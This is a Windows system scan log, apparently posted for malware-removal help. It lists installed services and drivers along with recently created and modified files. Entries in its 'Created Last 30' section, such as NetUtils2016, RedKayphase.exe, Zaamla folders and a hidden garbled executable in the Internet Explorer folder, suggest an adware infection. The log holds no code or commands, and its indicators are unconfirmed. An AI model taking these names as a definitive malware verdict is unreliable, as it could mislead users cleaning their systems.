R3 kltap;Kaspersky Security Data Escort Adapter;C:\WINDOWS\System32\drivers\kltap.sys [2016-6-7 52152]
R3 klupd_klif_kimul;klupd_klif_kimul;C:\WINDOWS\System32\drivers\klupd_klif_kimul.sys [2016-12-15 85984]
R3 klupd_klif_klark;klupd_klif_klark;C:\WINDOWS\System32\drivers\klupd_klif_klark.sys [2016-12-8 245512]
R3 klupd_klif_mark;klupd_klif_mark;C:\WINDOWS\System32\drivers\klupd_klif_mark.sys [2016-12-8 164888]
R3 LicenseManager;Windows License Manager Service;C:\WINDOWS\System32\svchost.exe -k LocalService [2016-7-16 44496]
R3 NcbService;Network Connection Broker;C:\WINDOWS\System32\svchost.exe -k LocalSystemNetworkRestricted [2016-7-16 44496]
R3 NdisVirtualBus;Microsoft Virtual Network Adapter Enumerator;C:\WINDOWS\System32\drivers\NdisVirtualBus.sys [2016-7-16 20480]
R3 NETwNe64;___ Intel(R) Wireless WiFi Link 5000 Series Adapter Driver for Windows 8 - 64 Bit;C:\WINDOWS\System32\drivers\NETwew01.sys [2016-7-16 3343872]
R3 PimIndexMaintenanceSvc_87960;Contact Data_87960;C:\WINDOWS\System32\svchost.exe -k UnistackSvcGroup [2016-7-16 44496]
R3 risdxc;risdxc;C:\WINDOWS\System32\drivers\risdxc64.sys [2013-7-5 106496]
R3 StateRepository;State Repository Service;C:\WINDOWS\System32\svchost.exe -k appmodel [2016-7-16 44496]
R3 TimeBrokerSvc;Time Broker;C:\WINDOWS\System32\svchost.exe -k LocalServiceNetworkRestricted [2016-7-16 44496]
R3 Tvti2c;Lenovo SM bus driver;C:\WINDOWS\System32\drivers\tvti2c.sys [2012-2-7 40248]
R3 tvtvcamd;ThinkVantage Virtual Camera;C:\WINDOWS\System32\drivers\tvtvcamd.sys [2013-7-5 27432]
R3 UnistoreSvc_87960;User Data Storage_87960;C:\WINDOWS\System32\svchost.exe -k UnistackSvcGroup [2016-7-16 44496]
R3 UserDataSvc_87960;User Data Access_87960;C:\WINDOWS\System32\svchost.exe -k UnistackSvcGroup [2016-7-16 44496]
R3 WSDScan;WSD Scan Support;C:\WINDOWS\System32\drivers\WSDScan.sys [2016-7-16 24576]
R3 WUDFWpdMtp;WUDFWpdMtp;C:\WINDOWS\System32\drivers\WUDFRd.sys [2016-7-16 216064]
S0 klelam;klelam;C:\WINDOWS\System32\drivers\klelam.sys [2016-3-30 28792]
S2 dbupdate;Dropbox Update Service (dbupdate);C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe [2016-12-27 143144]
S2 MapsBroker;Downloaded Maps Manager;C:\WINDOWS\System32\svchost.exe -k NetworkService [2016-7-16 44496]
S3 AcpiDev;ACPI Devices driver;C:\WINDOWS\System32\drivers\AcpiDev.sys [2016-7-16 18432]
S3 ADP80XX;ADP80XX;C:\WINDOWS\System32\drivers\adp80xx.sys [2016-7-16 1135456]
S3 AJRouter;AllJoyn Router Service;C:\WINDOWS\System32\svchost.exe -k LocalServiceNetworkRestricted [2016-7-16 44496]
S3 Apowersoft_AudioDevice;Apowersoft_AudioDevice;C:\WINDOWS\System32\drivers\Apowersoft_AudioDevice.sys [2013-10-20 31920]
S3 applockerfltr;Smartlocker Filter Driver;C:\WINDOWS\System32\drivers\applockerfltr.sys [2016-7-16 15360]
S3 AppReadiness;App Readiness;C:\WINDOWS\System32\svchost.exe -k AppReadiness [2016-7-16 44496]
S3 AppvStrm;AppvStrm;C:\WINDOWS\System32\drivers\AppVStrm.sys [2016-10-1 127328]
S3 AppvVemgr;AppvVemgr;C:\WINDOWS\System32\drivers\AppvVemgr.sys [2016-7-16 157024]
S3 AppvVfs;AppvVfs;C:\WINDOWS\System32\drivers\AppvVfs.sys [2016-7-16 141152]
S3 bcmfn;bcmfn Service;C:\WINDOWS\System32\drivers\bcmfn.sys [2016-7-16 9728]
S3 bcmfn2;bcmfn2 Service;C:\WINDOWS\System32\drivers\bcmfn2.sys [2016-7-16 9728]
S3 BthHFSrv;Bluetooth Handsfree Service;C:\WINDOWS\System32\svchost.exe -k LocalServiceAndNoImpersonation [2016-7-16 44496]
S3 btwampfl;btwampfl;C:\WINDOWS\System32\drivers\btwampfl.sys [2015-3-27 188160]
S3 buttonconverter;Service for Portable Device Control devices;C:\WINDOWS\System32\drivers\buttonconverter.sys [2016-7-16 38912]
S3 CapImg;HID driver for CapImg touch screen;C:\WINDOWS\System32\drivers\capimg.sys [2016-10-28 118272]
S3 cht4iscsi;cht4iscsi;C:\WINDOWS\System32\drivers\cht4sx64.sys [2016-7-16 346976]
S3 cht4vbd;Chelsio Virtual Bus Driver;C:\WINDOWS\System32\drivers\cht4vx64.sys [2016-7-16 2104160]
S3 dbupdatem;Dropbox Update Service (dbupdatem);C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe [2016-12-27 143144]
S3 DcpSvc;DataCollectionPublishingService;C:\WINDOWS\System32\svchost.exe -k netsvcs [2016-7-16 44496]
S3 DevQueryBroker;DevQuery Background Discovery Broker;C:\WINDOWS\System32\svchost.exe -k LocalSystemNetworkRestricted [2016-7-16 44496]
S3 dg_ssudbus;SAMSUNG Mobile USB Composite Device Driver (DEVGURU Ver.);C:\WINDOWS\System32\drivers\ssudbus.sys [2016-4-24 131712]
S3 diagnosticshub.standardcollector.service;Microsoft (R) Diagnostics Hub Standard Collector Service;C:\WINDOWS\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe [2016-7-16 93184]
S3 DmEnrollmentSvc;Device Management Enrollment Service;C:\WINDOWS\System32\svchost.exe -k netsvcs [2016-7-16 44496]
S3 dmwappushservice;dmwappushsvc;C:\WINDOWS\System32\svchost.exe -k netsvcs [2016-7-16 44496]
S3 DsSvc;Data Sharing Service;C:\WINDOWS\System32\svchost.exe -k LocalSystemNetworkRestricted [2016-7-16 44496]
S3 embeddedmode;Embedded Mode;C:\WINDOWS\System32\svchost.exe -k LocalSystemNetworkRestricted [2016-7-16 44496]
S3 EntAppSvc;Enterprise App Management Service;C:\WINDOWS\System32\svchost.exe -k appmodel [2016-7-16 44496]
S3 FrameServer;Windows Camera Frame Server;C:\WINDOWS\System32\svchost.exe -k Camera [2016-7-16 44496]
S3 genericusbfn;Generic USB Function Class;C:\WINDOWS\System32\drivers\genericusbfn.sys [2016-7-16 20480]
S3 hidinterrupt;Common Driver for HID Buttons implemented with interrupts;C:\WINDOWS\System32\drivers\hidinterrupt.sys [2016-7-16 50016]
S3 HvHost;HV Host Service;C:\WINDOWS\System32\svchost.exe -k LocalSystemNetworkRestricted [2016-7-16 44496]
S3 iagpio;Intel Serial IO GPIO Controller Driver;C:\WINDOWS\System32\drivers\iagpio.sys [2016-7-16 33280]
S3 iai2c;Intel(R) Serial IO I2C Host Controller;C:\WINDOWS\System32\drivers\iai2c.sys [2016-7-16 81408]
S3 iaLPSS2i_GPIO2;Intel(R) Serial IO GPIO Driver v2;C:\WINDOWS\System32\drivers\iaLPSS2i_GPIO2.sys [2016-7-16 64512]
S3 iaLPSS2i_I2C;Intel(R) Serial IO I2C Driver v2;C:\WINDOWS\System32\drivers\iaLPSS2i_I2C.sys [2016-7-16 176384]
S3 iaLPSSi_GPIO;Intel(R) Serial IO GPIO Controller Driver;C:\WINDOWS\System32\drivers\iaLPSSi_GPIO.sys [2016-7-16 38128]
S3 iaLPSSi_I2C;Intel(R) Serial IO I2C Controller Driver;C:\WINDOWS\System32\drivers\iaLPSSi_I2C.sys [2016-7-16 113152]
S3 iaStorAV;Intel(R) SATA RAID Controller Windows;C:\WINDOWS\System32\drivers\iaStorAV.sys [2016-7-16 673120]
S3 ibbus;Mellanox InfiniBand Bus/AL (Filter Driver);C:\WINDOWS\System32\drivers\ibbus.sys [2016-7-16 526176]
S3 icssvc;Windows Mobile Hotspot Service;C:\WINDOWS\System32\svchost.exe -k LocalServiceNetworkRestricted [2016-7-16 44496]
S3 IndirectKmd;Indirect Displays Kernel-Mode Driver;C:\WINDOWS\System32\drivers\IndirectKmd.sys [2016-7-16 35840]
S3 intaud_WaveExtensible;Intel WiDi Audio Device;C:\WINDOWS\System32\drivers\intelaud.sys [2015-12-1 50160]
S3 klvssbrigde64;klvssbrigde64;C:\Program Files (x86)\Kaspersky Lab\Kaspersky Total Security 17.0.0\x64\vssbridge64.exe [2016-6-28 77328]
S3 lfsvc;Geolocation Service;C:\WINDOWS\System32\svchost.exe -k netsvcs [2016-7-16 44496]
S3 LSCWinService;LSCWinService;C:\Program Files\Lenovo\Lenovo Solution Center\App\LSCWinService.exe [2015-12-10 272864]
S3 LSI_SAS2i;LSI_SAS2i;C:\WINDOWS\System32\drivers\lsi_sas2i.sys [2016-7-16 105824]
S3 LSI_SAS3i;LSI_SAS3i;C:\WINDOWS\System32\drivers\lsi_sas3i.sys [2016-7-16 101216]
S3 MBAMSwissArmy;MBAMSwissArmy;C:\WINDOWS\System32\drivers\MBAMSwissArmy.sys [2016-9-10 192216]
S3 megasas2i;megasas2i;C:\WINDOWS\System32\drivers\MegaSas2i.sys [2016-10-11 64352]
S3 MessagingService_87960;MessagingService_87960;C:\WINDOWS\System32\svchost.exe -k UnistackSvcGroup [2016-7-16 44496]
S3 mlx4_bus;Mellanox ConnectX Bus Enumerator;C:\WINDOWS\System32\drivers\mlx4_bus.sys [2016-7-16 842584]
S3 MsSecFlt;Microsoft Security Events Component Minifilter;C:\WINDOWS\System32\drivers\mssecflt.sys [2016-7-16 179040]
S3 ndfltr;NetworkDirect Service;C:\WINDOWS\System32\drivers\ndfltr.sys [2016-7-16 108896]
S3 NetAdapterCx;Network Adapter Wdf Class Extension Library;C:\WINDOWS\System32\drivers\NetAdapterCx.sys [2016-7-16 90624]
S3 NetSetupSvc;Network Setup Service;C:\WINDOWS\System32\svchost.exe -k netsvcs [2016-7-16 44496]
S3 NgcCtnrSvc;Microsoft Passport Container;C:\WINDOWS\System32\svchost.exe -k LocalServiceNetworkRestricted [2016-7-16 44496]
S3 NgcSvc;Microsoft Passport;C:\WINDOWS\System32\svchost.exe -k LocalSystemNetworkRestricted [2016-7-16 44496]
S3 percsas2i;percsas2i;C:\WINDOWS\System32\drivers\percsas2i.sys [2016-7-16 58720]
S3 percsas3i;percsas3i;C:\WINDOWS\System32\drivers\percsas3i.sys [2016-7-16 61792]
S3 PhoneSvc;Phone Service;C:\WINDOWS\System32\svchost.exe -k LocalService [2016-7-16 44496]
S3 ReFSv1;ReFSv1;C:\WINDOWS\System32\drivers\refsv1.sys [2016-7-16 928608]
S3 RetailDemo;Retail Demo Service;C:\WINDOWS\System32\svchost.exe -k netsvcs [2016-7-16 44496]
S3 ScDeviceEnum;Smart Card Device Enumeration Service;C:\WINDOWS\System32\svchost.exe -k LocalSystemNetworkRestricted [2016-7-16 44496]
S3 scmbus;Microsoft Storage Class Memory Bus Driver;C:\WINDOWS\System32\drivers\scmbus.sys [2016-7-16 88416]
S3 scmdisk0101;Microsoft NVDIMM-N disk driver;C:\WINDOWS\System32\drivers\scmdisk0101.sys [2016-7-16 123904]
S3 Sense;Windows Defender Advanced Threat Protection Service;C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe [2016-10-1 2889896]
S3 SensorDataService;Sensor Data Service;C:\WINDOWS\System32\SensorDataService.exe [2016-9-16 1312768]
S3 SensorService;Sensor Service;C:\WINDOWS\System32\svchost.exe -k LocalSystemNetworkRestricted [2016-7-16 44496]
S3 SerCx2;Serial UART Support Library;C:\WINDOWS\System32\drivers\SerCx2.sys [2016-7-16 151904]
S3 SmbDrvI;SmbDrvI;C:\WINDOWS\System32\drivers\Smb_driver_Intel.sys [2015-8-7 52912]
S3 smphost;Microsoft Storage Spaces SMP;C:\WINDOWS\System32\svchost.exe -k smphost [2016-7-16 44496]
S3 SmsRouter;Microsoft Windows SMS Router Service.;C:\WINDOWS\System32\svchost.exe -k LocalSystemNetworkRestricted [2016-7-16 44496]
S3 ssudmdm;SAMSUNG Mobile USB Modem Drivers (DEVGURU Ver.);C:\WINDOWS\System32\drivers\ssudmdm.sys [2016-4-24 165504]
S3 stornvme;Microsoft Standard NVM Express Driver;C:\WINDOWS\System32\drivers\stornvme.sys [2016-10-1 81760]
S3 storufs;Microsoft Universal Flash Storage (UFS) Driver;C:\WINDOWS\System32\drivers\storufs.sys [2016-7-16 32096]
S3 TieringEngineService;Storage Tiers Management;C:\WINDOWS\System32\TieringEngineService.exe [2016-7-16 287744]
S3 UcmCx0101;USB Connector Manager KMDF Class Extension;C:\WINDOWS\System32\drivers\UcmCx.sys [2016-7-16 95744]
S3 UcmTcpciCx0101;UCM-TCPCI KMDF Class Extension;C:\WINDOWS\System32\drivers\UcmTcpciCx.sys [2016-7-16 108544]
S3 UcmUcsi;USB Connector Manager UCSI Client;C:\WINDOWS\System32\drivers\UcmUcsi.sys [2016-7-16 50688]
S3 UdeCx;USB Device Emulation Support Library;C:\WINDOWS\System32\drivers\Udecx.sys [2016-7-16 45568]
S3 UEFI;Microsoft UEFI Driver;C:\WINDOWS\System32\drivers\uefi.sys [2016-7-16 28512]
S3 Ufx01000;USB Function Class Extension;C:\WINDOWS\System32\drivers\ufx01000.sys [2016-7-16 263008]
S3 UfxChipidea;USB Chipidea Controller;C:\WINDOWS\System32\drivers\UfxChipidea.sys [2016-7-16 96608]
S3 ufxsynopsys;USB Synopsys Controller;C:\WINDOWS\System32\drivers\ufxsynopsys.sys [2016-7-16 137056]
S3 UrsChipidea;Chipidea USB Role-Switch Driver;C:\WINDOWS\System32\drivers\urschipidea.sys [2016-7-16 28512]
S3 UrsCx01000;USB Role-Switch Support Library;C:\WINDOWS\System32\drivers\urscx01000.sys [2016-7-16 57696]
S3 UrsSynopsys;Synopsys USB Role-Switch Driver;C:\WINDOWS\System32\drivers\urssynopsys.sys [2016-7-16 27488]
S3 USBAAPL64;Apple Mobile USB Driver;C:\WINDOWS\System32\drivers\usbaapl64.sys [2015-6-10 54784]
S3 UsoSvc;Update Orchestrator Service for Windows Update;C:\WINDOWS\System32\svchost.exe -k netsvcs [2016-7-16 44496]
S3 vhf;Virtual HID Framework (VHF) Driver;C:\WINDOWS\System32\drivers\vhf.sys [2016-7-16 32256]
S3 vmgid;Microsoft Hyper-V Guest Infrastructure Driver;C:\WINDOWS\System32\drivers\vmgid.sys [2016-7-16 10240]
S3 vmicguestinterface;Hyper-V Guest Service Interface;C:\WINDOWS\System32\svchost.exe -k LocalSystemNetworkRestricted [2016-7-16 44496]
S3 vmicvmsession;Hyper-V PowerShell Direct Service;C:\WINDOWS\System32\svchost.exe -k LocalSystemNetworkRestricted [2016-7-16 44496]
S3 w3logsvc;W3C Logging Service;C:\WINDOWS\System32\svchost.exe -k apphost [2016-7-16 44496]
S3 WalletService;WalletService;C:\WINDOWS\System32\svchost.exe -k appmodel [2016-7-16 44496]
S3 WD Backup Drive Helper;WD Backup Drive Helper;C:\Windows\SysWOW64\dllhost.exe [2016-7-16 19808]
S3 WD Backup Snapshot;WD Backup Snapshot;C:\Windows\SysWOW64\dllhost.exe [2016-7-16 19808]
S3 WDC_SAM;WD SCSI Pass Thru driver;C:\WINDOWS\System32\drivers\wdcsam64.sys [2015-11-12 26880]
S3 wdiwifi;WDI Driver Framework;C:\WINDOWS\System32\drivers\WdiWiFi.sys [2016-10-1 719360]
S3 WdNisDrv;Windows Defender Network Inspection System Driver;C:\WINDOWS\System32\drivers\WdNisDrv.sys [2016-7-16 123232]
S3 WdNisSvc;Windows Defender Network Inspection Service;C:\Program Files\Windows Defender\NisSrv.exe [2016-7-16 347328]
S3 WEPHOSTSVC;Windows Encryption Provider Host Service;C:\WINDOWS\System32\svchost.exe -k WepHostSvcGroup [2016-7-16 44496]
S3 WinMad;WinMad Service;C:\WINDOWS\System32\drivers\winmad.sys [2016-7-16 32096]
S3 WinVerbs;WinVerbs Service;C:\WINDOWS\System32\drivers\winverbs.sys [2016-7-16 64864]
S3 wisvc;Windows Insider Service;C:\WINDOWS\System32\svchost.exe -k netsvcs [2016-7-16 44496]
S3 workfolderssvc;Work Folders;C:\WINDOWS\System32\svchost.exe -k LocalService [2016-7-16 44496]
S3 WpnUserService_87960;Windows Push Notifications User Service_87960;C:\WINDOWS\System32\svchost.exe -k UnistackSvcGroup [2016-7-16 44496]
S3 XblAuthManager;Xbox Live Auth Manager;C:\WINDOWS\System32\svchost.exe -k netsvcs [2016-7-16 44496]
S3 XblGameSave;Xbox Live Game Save;C:\WINDOWS\System32\svchost.exe -k netsvcs [2016-7-16 44496]
S3 xboxgip;Xbox Game Input Protocol Driver;C:\WINDOWS\System32\drivers\xboxgip.sys [2016-12-9 258560]
S3 XboxNetApiSvc;Xbox Live Networking Service;C:\WINDOWS\System32\svchost.exe -k netsvcs [2016-7-16 44496]
S3 xinputhid;XINPUT HID Filter Driver;C:\WINDOWS\System32\drivers\xinputhid.sys [2016-9-13 43520]
S4 AppVClient;Microsoft App-V Client;C:\WINDOWS\System32\AppVClient.exe [2016-10-1 823136]
S4 shpamsvc;Shared PC Account Manager;C:\WINDOWS\System32\svchost.exe -k netsvcs [2016-7-16 44496]
S4 tzautoupdate;Auto Time Zone Updater;C:\WINDOWS\System32\svchost.exe -k LocalService [2016-7-16 44496]
S4 UevAgentDriver;UevAgentDriver;C:\WINDOWS\System32\drivers\UevAgentDriver.sys [2016-7-16 40288]
S4 UevAgentService;User Experience Virtualization Service;C:\WINDOWS\System32\AgentService.exe [2016-7-16 1227264]
S4 wlcrasvc;Windows Live Mesh remote connections service;C:\Program Files\Windows Live\Mesh\wlcrasvc.exe [2010-9-22 57184]
.
=============== Created Last 30 ================
.
2017-01-07 23:36:53 -------- d-----w- C:\ProgramData\AppalmaaZ
2017-01-07 23:20:38 -------- d-----w- C:\Program Files (x86)\Common Files\Inlux
2017-01-07 23:20:34 -------- d-----w- C:\ProgramData\Logic Handler
2017-01-07 23:20:33 -------- d-----w- C:\ProgramData\Zaamlas
2017-01-07 23:20:29 -------- d-----w- C:\Users\King\AppData\Local\DailyBee
2017-01-07 23:20:25 1938538 ----a-w- C:\Users\King\AppData\Roaming\Fixcore.bin
2017-01-07 23:20:16 -------- d-----w- C:\ProgramData\Zaamla
2017-01-07 23:20:10 629760 ----a-w- C:\Users\King\AppData\Roaming\RedKayphase.exe
2017-01-07 23:20:05 -------- d-----w- C:\ProgramData\NetworkPacketManitor
2017-01-07 23:20:03 -------- d-----w- C:\Users\King\AppData\Roaming\DailyBee
2017-01-07 23:19:48 -------- d-----w- C:\Users\King\AppData\Roaming\HDWallPaper
2017-01-07 23:19:47 -------- d-----w- C:\WINDOWS\SysWow64\sstmp
2017-01-07 23:19:47 -------- d-----w- C:\WINDOWS\System32\sstmp
2017-01-07 23:19:46 909944 ----a-w- C:\WINDOWS\System32\drivers\NetUtils2016.sys
2017-01-07 23:19:46 625272 ----a-w- C:\WINDOWS\System32\NetUtils2016.dll
2017-01-07 23:19:46 470592 ----a-w- C:\WINDOWS\SysWow64\NetUtils2016.exe
2017-01-07 23:19:45 -------- d-----w- C:\Program Files (x86)\HDWallPaper
2017-01-07 23:19:32 -------- d-----w- C:\Program Files (x86)\4baf5696-ef63-4372-a50c-30bd8cd532291483831172
2017-01-07 23:18:42 825536 ---h--w- C:\Program Files (x86)\Internet Explorer\i??pl?r?.b?t.exe
2017-01-07 23:15:19 -------- d-----w- C:\Users\King\AppData\Local\4kdownload.com
2017-01-06 02:41:30 -------- d---a-w- C:\Program Files (x86)\TumblRipper
2017-01-06 02:33:03 -------- d-----w- C:\Users\King\AppData\Local\jzab.de
2017-01-04 23:39:26 -------- d-----w- C:\Users\King\AppData\Local\IsolatedStorage
2017-01-04 23:37:44 -------- d-----w- C:\Users\King\AppData\Roaming\Intuit
2017-01-04 23:36:14 -------- d---a-w- C:\Program Files (x86)\Common Files\Intuit
2017-01-04 23:36:05 -------- d-----w- C:\Program Files (x86)\TurboTax
2017-01-04 23:35:54 -------- d-----w- C:\ProgramData\Intuit
2016-12-27 18:37:07 -------- d-----w- C:\Program Files (x86)\Dropbox
2016-12-27 18:23:52 -------- d-----w- C:\WINDOWS\Panther
2016-12-21 18:15:36 75888 ----a-w- C:\WINDOWS\System32\drivers\dbx-stable.sys
2016-12-21 18:15:36 75888 ----a-w- C:\WINDOWS\System32\drivers\dbx-dev.sys
2016-12-21 18:15:36 75888 ----a-w- C:\WINDOWS\System32\drivers\dbx-canary.sys
2016-12-21 18:15:36 42096 ----a-w- C:\WINDOWS\System32\DbxSvc.exe
2016-12-16 23:23:59 -------- d-----w- C:\Program Files (x86)\GUMCB42.tmp
2016-12-15 13:03:31 85984 ----a-w- C:\WINDOWS\System32\drivers\klupd_klif_kimul.sys
2016-12-15 03:19:48 872408 ----a-w- C:\Program Files (x86)\Mozilla Firefox\uninstall\helper.exe
2016-12-15 03:19:48 231880 ----a-w- C:\Program Files (x86)\Mozilla Firefox\gmp-clearkey\0.1\clearkey.dll
2016-12-15 02:57:00 -------- d-----w- C:\Program Files\iPod
2016-12-15 02:56:59 -------- d---a-w- C:\Program Files\iTunes
.
==================== Find3M ====================
.
2016-12-11 23:56:25 835576 ----a-w- C:\WINDOWS\SysWow64\FlashPlayerApp.exe
2016-12-11 23:56:25 177656 ----a-w- C:\WINDOWS\SysWow64\FlashPlayerCPLApp.cpl
2016-12-10 01:52:21 180224 ----a-w- C:\WINDOWS\System32\enrollmentapi.dll
2016-12-09 10:42:15 1637728 ----a-w- C:\WINDOWS\System32\appraiser.dll
2016-12-09 10:42:14 137568 ----a-w- C:\WINDOWS\System32\acmigration.dll
2016-12-09 10:34:34 894096 ----a-w- C:\WINDOWS\System32\winresume.exe
2016-12-09 10:34:34 1051112 ----a-w- C:\WINDOWS\System32\winresume.efi
2016-12-09 10:33:26 1354320 ----a-w- C:\WINDOWS\System32\winload.efi
2016-12-09 10:33:26 1173496 ----a-w- C:\WINDOWS\System32\winload.exe
2016-12-09 10:32:11 7816032 ----a-w- C:\WINDOWS\System32\ntoskrnl.exe
2016-12-09 10:30:39 377184 ----a-w- C:\WINDOWS\System32\drivers\clfs.sys
2016-12-09 10:29:23 2681200 ----a-w- C:\WINDOWS\System32\CoreUIComponents.dll
2016-12-09 10:28:24 764392 ----a-w- C:\WINDOWS\System32\CoreMessaging.dll
2016-12-09 10:27:38 172528 ----a-w- C:\WINDOWS\System32\sspicli.dll
2016-12-09 10:20:21 2677544 ----a-w- C:\WINDOWS\System32\d3d10warp.dll
2016-12-09 10:20:20 2189664 ----a-w- C:\WINDOWS\System32\drivers\dxgkrnl.sys
2016-12-09 10:20:16 658784 ----a-w- C:\WINDOWS\System32\drivers\dxgmms2.sys
2016-12-09 10:20:13 402272 ----a-w- C:\WINDOWS\System32\drivers\dxgmms1.sys
2016-12-09 10:20:12 1738560 ----a-w- C:\WINDOWS\System32\WindowsCodecs.dll
2016-12-09 10:19:35 1293152 ----a-w- C:\WINDOWS\System32\LicenseManager.dll
2016-12-09 10:19:21 168424 ----a-w- C:\WINDOWS\System32\bcrypt.dll
2016-12-09 10:18:47 624048 ----a-w- C:\WINDOWS\System32\drivers\cng.sys
2016-12-09 10:18:21 2913144 ----a-w- C:\WINDOWS\System32\combase.dll
2016-12-09 10:18:16 1100128 ----a-w- C:\WINDOWS\System32\hvix64.exe
2016-12-09 10:18:15 1267512 ----a-w- C:\WINDOWS\System32\WinTypes.dll
2016-12-09 10:18:14 811872 ----a-w- C:\WINDOWS\System32\hvloader.exe
2016-12-09 10:18:12 947552 ----a-w- C:\WINDOWS\System32\hvloader.efi
2016-12-09 10:18:09 989024 ----a-w- C:\WINDOWS\System32\hvax64.exe
2016-12-09 10:15:26 8168000 ----a-w- C:\WINDOWS\System32\Windows.Media.Protection.PlayReady.dll
2016-12-09 10:15:18 1988560 ----a-w- C:\WINDOWS\System32\mfmp4srcsnk.dll
2016-12-09 10:14:50 1274712 ----a-w- C:\WINDOWS\System32\ole32.dll
2016-12-09 10:14:33 241504 ----a-w- C:\WINDOWS\System32\CloudExperienceHost.dll
2016-12-09 10:11:15 2048496 ----a-w- C:\WINDOWS\SysWow64\CoreUIComponents.dll
2016-12-09 10:10:58 1461200 ----a-w- C:\WINDOWS\System32\user32.dll
2016-12-09 10:10:40 1572768 ----a-w- C:\WINDOWS\System32\gdi32full.dll
2016-12-09 10:09:27 455520 ----a-w- C:\WINDOWS\System32\securekernel.exe
2016-12-09 10:01:59 2323728 ----a-w- C:\WINDOWS\SysWow64\d3d10warp.dll
2016-12-09 10:01:43 1503544 ----a-w- C:\WINDOWS\SysWow64\WindowsCodecs.dll
2016-12-09 10:01:08 861024 ----a-w- C:\WINDOWS\SysWow64\LicenseManager.dll
2016-12-09 10:00:58 106896 ----a-w- C:\WINDOWS\SysWow64\bcrypt.dll
2016-12-09 09:59:25 846560 ----a-w- C:\WINDOWS\SysWow64\WinTypes.dll
2016-12-09 09:59:24 2166752 ----a-w- C:\WINDOWS\SysWow64\combase.dll
2016-12-09 09:57:01 1852720 ----a-w- C:\WINDOWS\SysWow64\mfmp4srcsnk.dll
2016-12-09 09:57:00 6668040 ----a-w- C:\WINDOWS\SysWow64\Windows.Media.Protection.PlayReady.dll
2016-12-09 09:56:15 959112 ----a-w- C:\WINDOWS\SysWow64\ole32.dll
2016-12-09 09:52:21 1435896 ----a-w- C:\WINDOWS\SysWow64\user32.dll
2016-12-09 09:52:21 1415752 ----a-w- C:\WINDOWS\SysWow64\gdi32full.dll
2016-12-09 09:51:08 117240 ----a-w- C:\WINDOWS\SysWow64\sspicli.dll
2016-12-09 09:47:29 22563328 ----a-w- C:\WINDOWS\System32\edgehtml.dll
2016-12-09 09:45:47 40448 ----a-w- C:\WINDOWS\System32\WordBreakers.dll
2016-12-09 09:45:43 206848 ----a-w- C:\WINDOWS\System32\win32k.sys
2016-12-09 09:42:29 227328 ----a-w- C:\WINDOWS\System32\cdd.dll
2016-12-09 09:41:22 380928 ----a-w- C:\WINDOWS\System32\wincorlib.dll
2016-12-09 09:41:06 32768 ----a-w- C:\WINDOWS\SysWow64\WordBreakers.dll
2016-12-09 09:40:38 147968 ----a-w- C:\WINDOWS\SysWow64\win32k.sys
2016-12-09 09:38:39 324608 ----a-w- C:\WINDOWS\System32\Windows.ApplicationModel.LockScreen.dll
2016-12-09 09:37:29 261632 ----a-w- C:\WINDOWS\System32\indexeddbserver.dll
2016-12-09 09:37:10 411136 ----a-w- C:\WINDOWS\System32\facecredentialprovider.dll
2016-12-09 09:37:01 49152 ----a-w- C:\WINDOWS\System32\Windows.UI.Shell.dll
2016-12-09 09:36:56 425984 ----a-w- C:\WINDOWS\System32\aadcloudap.dll
2016-12-09 09:36:32 410112 ----a-w- C:\WINDOWS\System32\AppXDeploymentClient.dll
2016-12-09 09:36:09 3059200 ----a-w- C:\WINDOWS\System32\msi.dll
2016-12-09 09:36:05 231936 ----a-w- C:\WINDOWS\SysWow64\Windows.ApplicationModel.LockScreen.dll
2016-12-09 09:36:02 6285312 ----a-w- C:\WINDOWS\System32\Windows.Media.dll
2016-12-09 09:34:52 822784 ----a-w- C:\WINDOWS\SysWow64\Chakradiag.dll
2016-12-09 09:34:31 288768 ----a-w- C:\WINDOWS\SysWow64\wincorlib.dll
2016-12-09 09:33:42 3777536 ----a-w- C:\WINDOWS\System32\MFMediaEngine.dll
2016-12-09 09:33:37 1589760 ----a-w- C:\WINDOWS\System32\msdtctm.dll
2016-12-09 09:32:18 635904 ----a-w- C:\WINDOWS\SysWow64\jscript9diag.dll
2016-12-09 09:31:22 3689984 ----a-w- C:\WINDOWS\SysWow64\msi.dll
2016-12-09 09:31:20 198656 ----a-w- C:\WINDOWS\SysWow64\indexeddbserver.dll
2016-12-09 09:31:11 313856 ----a-w- C:\WINDOWS\SysWow64\AppXDeploymentClient.dll
2016-12-09 09:30:32 19413504 ----a-w- C:\WINDOWS\SysWow64\edgehtml.dll
2016-12-09 09:30:31 4612608 ----a-w- C:\WINDOWS\SysWow64\Windows.Media.dll
2016-12-09 09:29:51 4749312 ----a-w- C:\WINDOWS\System32\SettingsHandlers_nt.dll
2016-12-09 09:28:55 1004544 ----a-w- C:\WINDOWS\System32\enterprisecsps.dll
2016-12-09 09:28:12 3306496 ----a-w- C:\WINDOWS\SysWow64\MFMediaEngine.dll
2016-12-09 09:27:55 5114368 ----a-w- C:\WINDOWS\System32\cdp.dll
2016-12-09 09:27:36 981504 ----a-w- C:\WINDOWS\System32\Windows.Security.Authentication.OnlineId.dll
2016-12-09 09:26:32 8129536 ----a-w- C:\WINDOWS\System32\Chakra.dll
2016-12-09 09:26:01 1692672 ----a-w- C:\WINDOWS\System32\AppXDeploymentExtensions.onecore.dll
2016-12-09 09:25:28 376832 ----a-w- C:\WINDOWS\System32\CryptoWinRT.dll
2016-12-09 09:24:21 2275840 ----a-w- C:\WINDOWS\System32\AppXDeploymentServer.dll
2016-12-09 09:22:27 1490944 ----a-w- C:\WINDOWS\System32\lsasrv.dll
2016-12-09 09:22:06 2820096 ----a-w- C:\WINDOWS\System32\InputService.dll
2016-12-09 09:22:02 2688512 ----a-w- C:\WINDOWS\System32\Windows.UI.Logon.dll
2016-12-09 09:21:48 4746752 ----a-w- C:\WINDOWS\System32\jscript9.dll
2016-12-09 09:21:42 3616768 ----a-w- C:\WINDOWS\System32\win32kfull.sys
2016-12-09 09:21:31 1512960 ----a-w- C:\WINDOWS\System32\win32kbase.sys
2016-12-09 09:21:04 716800 ----a-w- C:\WINDOWS\System32\ShareHost.dll
2016-12-09 09:20:36 730624 ----a-w- C:\WINDOWS\System32\fveapi.dll
2016-12-09 09:20:35 3198464 ----a-w- C:\WINDOWS\SysWow64\cdp.dll
2016-12-09 09:20:33 6044160 ----a-w- C:\WINDOWS\SysWow64\Chakra.dll
